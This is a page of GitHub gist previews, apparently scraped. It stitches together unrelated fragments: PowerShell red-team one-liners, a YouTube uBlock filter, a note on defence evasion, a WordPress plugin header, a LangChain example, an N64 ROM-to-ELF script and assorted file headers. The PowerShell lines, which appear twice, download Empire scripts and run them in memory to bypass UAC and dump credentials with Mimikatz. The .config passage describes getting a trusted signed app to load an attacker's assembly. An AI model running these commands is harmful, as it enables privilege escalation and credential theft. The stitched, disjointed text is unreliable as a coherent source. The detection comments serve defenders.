Simple overview of use/purpose.
An in-depth paragraph about your project and overview of use.
[+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# All three one-liners below share one shape: a new powershell.exe is started with the execution policy set to bypass,
# a script is fetched as a string from raw.githubusercontent.com, and that string is run in memory with IEX.
# The URLs point at the master branch, so what runs is whatever that branch serves at the time; nothing on these lines pins or verifies the content.
# For detection: these lines hand the script text straight to IEX instead of saving it to a file, so the usual telemetry is the
# process command line, PowerShell script block logging (event ID 4104) and AMSI rather than a file scan.
#Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
#Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
#Import Mimikatz Module to run further commands | |
# -noexit keeps the session open after the script has been loaded, so nothing is invoked by this line itself.
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" |
! [Add this to the "My filters" section of uBlock Origin's settings] | |
! ### Remove YouTube's gorram "Breaking news" section ### | |
! ### I go to YouTube to AVOID daily bullshit, not to have it shoved in my face!! ### | |
! This removes page-width blocks - `<ytd-rich-section-renderer>` tags - which have a descendent somewhere with ID "title" and the text "Breaking news". | |
! The match on "Breaking news" uses a regular expression primarily so that it can be made case-insensitive. | |
! The `#title` tag we're matching looked like this, at least for me on 2020-02-01: | |
! <span id="title" class="style-scope ytd-rich-shelf-renderer">Breaking news</span> | |
! The other two `:has()` rules are just a bit of extra filtering that I hope might improve performance and/or reduce the chance of this rule matching where it's not wanted. | |
! YouTube is likely to change things and break this rule before too long, in which case removing `:has(:scope #dismissable)` and `:has(:scope #featured-badge)` may help. | |
! Note that `:scope` limits matches to |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# Both commands below start powershell.exe with the execution policy set to bypass, download a script as a string
# from the master branch on raw.githubusercontent.com and run it in memory with IEX; the content is neither pinned nor verified here.
# For detection: the command line itself carries the download URL and the IEX call, and PowerShell script block logging
# (event ID 4104) and AMSI see the script text that IEX receives.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
# Invoke-Mimikatz: Dump credentials from memory | |
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Mimikatz Module to run further commands |
We can do this by experimenting with .config files.
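Many defenders detect renamed files by comparing a binary's Original Filename with its process name.
In this example, we don't have to rename anything. We simply coerce a trusted, signed app to load our Assembly.
We do this by directing the application to read a config file we provide. A name-matching check has nothing to flag in that case; what remains visible is the .config file placed next to the signed binary and the assembly that process then loads.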
<?php | |
/** | |
* Plugin Name: WP Rocket | Disable Cache Preloading | |
* Description: Prevents WP Rocket’s preload bot from visiting your site. | |
* Author: WP Rocket Support Team | |
* Author URI: http://wp-rocket.me/ | |
* Plugin URI: https://gist.github.com/glueckpress/a6c1f7a22a92e8e8bb10 | |
* License: GNU General Public License v3 or later | |
* License URI: http://www.gnu.org/licenses/gpl-3.0.html | |
*/ |
"""This is an example of how to use async langchain with fastapi and return a streaming response. | |
The latest version of Langchain has improved its compatibility with asynchronous FastAPI, | |
making it easier to implement streaming functionality in your applications. | |
""" | |
import asyncio | |
import os | |
from typing import AsyncIterable, Awaitable | |
import uvicorn | |
from dotenv import load_dotenv |
#!/usr/bin/bash | |
# Wraps the raw N64 ROM image test.z64 in an ELF container (foo.elf) using dd and mips-elf-objcopy.
# Input and output file names are hard-coded and resolved relative to the current directory.
# Get entry point from N64 ROM | |
# Copies the 4 bytes at file offset 8 of test.z64 into a file named "entrypoint".
# dd's stdout and stderr both go to /dev/null, so a failed read is silent.
dd if=test.z64 bs=1 skip=8 count=4 of=entrypoint >& /dev/null | |
# Convert entrypoint to little endian | |
# Disabled step: it would byte-swap that 4-byte word, writing back to the same file.
#mips-elf-objcopy -I binary -O binary --reverse-bytes=4 entrypoint entrypoint | |
# Construct an ELF | |
# Reads the whole ROM as a raw binary blob, emits a big-endian 32-bit MIPS ELF and adds 0x80000000 to the .data section's VMA.
# NOTE(review): nothing visible here feeds the extracted "entrypoint" file into this step; confirm whether later lines use it.
mips-elf-objcopy -I binary test.z64 -O elf32-bigmips -B mips --adjust-section-vma .data+0x80000000 foo.elf | |
# Patch to MIPS III | |
# Overwrites 4 bytes at offset 36 of foo.elf, which is the e_flags field of an ELF32 header, with 20 00 00 00
# (0x20000000 big-endian, EF_MIPS_ARCH_3). conv=notrunc leaves the rest of the file in place.
printf '\x20\x00\x00\x00' | dd bs=1 seek=36 count=4 conv=notrunc of=foo.elf >& /dev/null |
import asyncio | |
import copy | |
import hashlib | |
import json | |
import os | |
import random | |
from dataclasses import dataclass | |
from typing import Any, Dict, List, Optional | |
import numpy as np |
#!/usr/bin/python | |
# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved. | |
# | |
# Licensed under the Amazon Software License (the "License"). You may not use | |
# this file except in compliance with the License. A copy of the License is | |
# located at http://aws.amazon.com/asl/ or in the "license" file accompanying | |
# this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR | |
# CONDITIONS OF ANY KIND, either express or implied. See the License for the specific | |
# language governing permissions and limitations under the License. |